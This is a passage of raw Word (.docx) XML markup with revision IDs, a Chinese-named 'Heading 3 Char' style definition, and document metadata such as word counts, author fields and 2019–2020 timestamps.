    <w:rsid w:val="00932560"/>
    <w:rsid w:val="00AC7B99"/>
    <w:rsid w:val="00B05BBC"/>
    <w:rsid w:val="00B208FB"/>
    <w:rsid w:val="00B6376B"/>
    <w:rsid w:val="00C23F73"/>
    <w:rsid w:val="00C7680F"/>
    <w:rsid w:val="00CF0D85"/>
    <w:rsid w:val="00CF276B"/>
    <w:rsid w:val="00D91E25"/>
    <w:rsid w:val="00E902C6"/>
    <w:rsid w:val="00FA4D7D"/>
    <w:rsid w:val="00FC15E6"/>
    <w:rsid w:val="6DC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9"/>
    <w:link w:val="5"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13">
    <w:name w:val="标题 3 Char"/>
    <w:basedOn w:val="9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9"/>
    <w:link w:val="7"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E55158-F374-4583-9A64-5DD26E1427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235</Words>
  <Characters>1346</Characters>
  <Lines>11</Lines>
  <Paragraphs>3</Paragraphs>
  <TotalTime>1568</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1578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2019-09-17T01:36:00Z</dcterms:created>
  <dc:creator>Windows User</dc:creator>
  <cp:lastModifiedBy>test用户·</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-28T11:15:34Z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